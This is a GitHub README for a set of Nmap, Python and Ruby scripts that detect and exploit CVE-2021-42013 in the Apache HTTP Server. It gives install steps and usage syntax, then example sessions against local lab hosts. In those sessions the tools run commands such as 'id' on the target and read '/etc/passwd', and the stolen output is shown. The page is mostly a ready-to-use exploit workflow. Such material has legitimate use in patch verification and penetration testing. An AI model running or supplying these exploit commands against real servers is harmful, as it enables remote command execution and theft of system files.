Skip to content

These Nmap, Python and Ruby scripts detects and exploits CVE-2021-42013 with RCE and local file disclosure.

License

Notifications You must be signed in to change notification settings

mauricelambert/CVE-2021-42013

Repository files navigation

CVE-2021-42013

Description

This script exploits CVE-2021-42013 to print file or/and execute command.

This script is available for:

  • Nmap
  • Python
  • Ruby

Requirements

Python

  • python3
  • python3 Standard Library

Ruby

  • Ruby
  • Ruby Standard Library

Install

git clone https://github.com/mauricelambert/CVE-2021-42013.git
cd CVE-2021-42013

# Python
pip install -r requirements.txt

Usages

# Python
python3 CVE202142013.py [(-f/--file FILE|-c/--commands COMMAND1 COMMAND2 ...) -s/--ssl -o/--output FILE target]

# Nmap
nmap -p 80 --script RCE_CVE2021_41773 [--script-args "file=<file>" "command=<command>"] <target>

# Ruby
ruby CVE-2021-41773.rb [(-f/--file FILE|-c/--commands "COMMAND1;COMMAND2;...") -o/--output FILE target]

Examples

Python

~# python3 CVE202142013.py 127.0.0.1:80
 
CVE-2021-42013  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
 
PythonToolsKit  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
[-] Target is not vulnerable.
 
~# python3 CVE202142013.py 172.17.0.2
 
CVE-2021-42013  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
 
PythonToolsKit  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
[+] Target is vulnerable.
 
~# python3 CVE202142013.py -c "id" "echo H4CK" -c "cat /etc/passwd" -u "/" 172.17.0.2
 
CVE-2021-42013  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
 
PythonToolsKit  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
[+] Target is vulnerable.
uid=33(www-data) gid=33(www-data) groups=33(www-data)
H4CK
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
 
~# python3 CVE202142013.py -f "/etc/passwd" -o out.txt 172.17.0.2
 
CVE-2021-42013  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
 
PythonToolsKit  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
[+] Target is vulnerable.
 
~# cat out.txt
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
~# python3 CVE202142013.py -u "error" -f "/do/not/exists" 172.17.0.2
 
CVE-2021-42013  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
 
PythonToolsKit  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
[+] Target is vulnerable.
[-] Exploit is not working (HTTP error 403).
 
~# python3 CVE202142013.py -f "/do/not/exists" 172.17.0.2
 
CVE-2021-42013  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
 
PythonToolsKit  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
 
[+] Target is vulnerable.
[-] Exploit is not working (HTTP error 404).
 
~#

Ruby

~# ruby CVE-2021-41773.rb 127.0.0.1

CVE-2021-41773  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.

[+] Target: 127.0.0.1 is vulnerable

~# ruby CVE-2021-41773.rb -c "id; echo abc" 127.0.0.1

CVE-2021-41773  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.

[+] Target is vulnerable.
uid=33(www-data) gid=33(www-data) groups=33(www-data)
abc

~# ruby CVE-2021-41773.rb -f "/etc/passwd" -o abc.txt

CVE-2021-41773  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.

Host (target): 127.0.0.1
[+] Target is vulnerable.

~# cat abc.txt
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
~# 

Nmap

~# nmap -p 80 --script RCE_CVE2021_42013 172.17.0.2  
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 07:39 CET
NSE: Web service is up. Send payload...
NSE: Mode: detect only. No exploit.
NSE: Target is vulnerable.
Nmap scan report for 172.17.0.2
Host is up (0.00015s latency).

PORT   STATE SERVICE
80/tcp open  http
| RCE_CVE2021_42013: 
|   CVE-2021-42013: 
|     title: Apache CVE-2021-42013 RCE
|     state: VULNERABLE (Exploitable)
|     ids: 
|       CVE:CVE-2021-42013
|     description: 
|       The Apache Web Server contains a RCE vulnerability. This
|       script detects and exploits this vulnerability with RCE
|       attack (execute commands) and local file disclosure.
|     dates: 
|       disclosure: 
|         year: 2021
|         day: 06
|         month: 10
|     disclosure: 2021-10-06
|     refs: 
|       https://nvd.nist.gov/vuln/detail/CVE-2021-42013
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013
|_      https://github.com/mauricelambert/CVE-2021-42013

Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds
~# nmap -p 80 --script RCE_CVE2021_42013 --script-args "file=/etc/passwd" 172.17.0.2
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 07:38 CET
NSE: Web service is up. Send payload...
NSE: Mode: exploit local file disclosure
NSE: Target is vulnerable.
NSE: Exploit is working.
Nmap scan report for 172.17.0.2
Host is up (0.00017s latency).

PORT   STATE SERVICE
80/tcp open  http
| RCE_CVE2021_42013: 
|   CVE-2021-42013: 
|     title: Apache CVE-2021-42013 RCE
|     state: VULNERABLE (Exploitable)
|     ids: 
|       CVE:CVE-2021-42013
|     description: 
|       The Apache Web Server contains a RCE vulnerability. This
|       script detects and exploits this vulnerability with RCE
|       attack (execute commands) and local file disclosure.
|     dates: 
|       disclosure: 
|         month: 10
|         year: 2021
|         day: 06
|     disclosure: 2021-10-06
|     refs: 
|       https://github.com/mauricelambert/CVE-2021-42013
|       https://nvd.nist.gov/vuln/detail/CVE-2021-42013
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013
|     exploit output: 
|        
| root:x:0:0:root:/root:/bin/bash
| www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
|_

Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
~# nmap -p 80 --script RCE_CVE2021_42013 --script-args "command=id" 172.17.0.2
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 07:32 CET
NSE: Web service is up. Send payload...
NSE: Mode: exploit RCE
NSE: Target is vulnerable.
NSE: Exploit is working.
Nmap scan report for 172.17.0.2
Host is up (0.00087s latency).

PORT   STATE SERVICE
80/tcp open  http
| RCE_CVE2021_42013: 
|   CVE-2021-42013: 
|     title: Apache CVE-2021-42013 RCE
|     state: VULNERABLE (Exploitable)
|     ids: 
|       CVE:CVE-2021-42013
|     description: 
|       The Apache Web Server contains a RCE vulnerability. This
|       script detects and exploits this vulnerability with RCE
|       attack (execute commands) and local file disclosure.
|     dates: 
|       disclosure: 
|         day: 06
|         year: 2021
|         month: 10
|     disclosure: 2021-10-06
|     refs: 
|       https://nvd.nist.gov/vuln/detail/CVE-2021-42013
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013
|       https://github.com/mauricelambert/CVE-2021-42013
|     exploit output: 
|        
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|_

Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds
~# 

Exit codes

  • 0: Target is vulnerable
  • 1: Target is not vulnerable
  • 127: State unknown

Links

Licence

Licensed under the GPL, version 3.

About

These Nmap, Python and Ruby scripts detects and exploits CVE-2021-42013 with RCE and local file disclosure.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published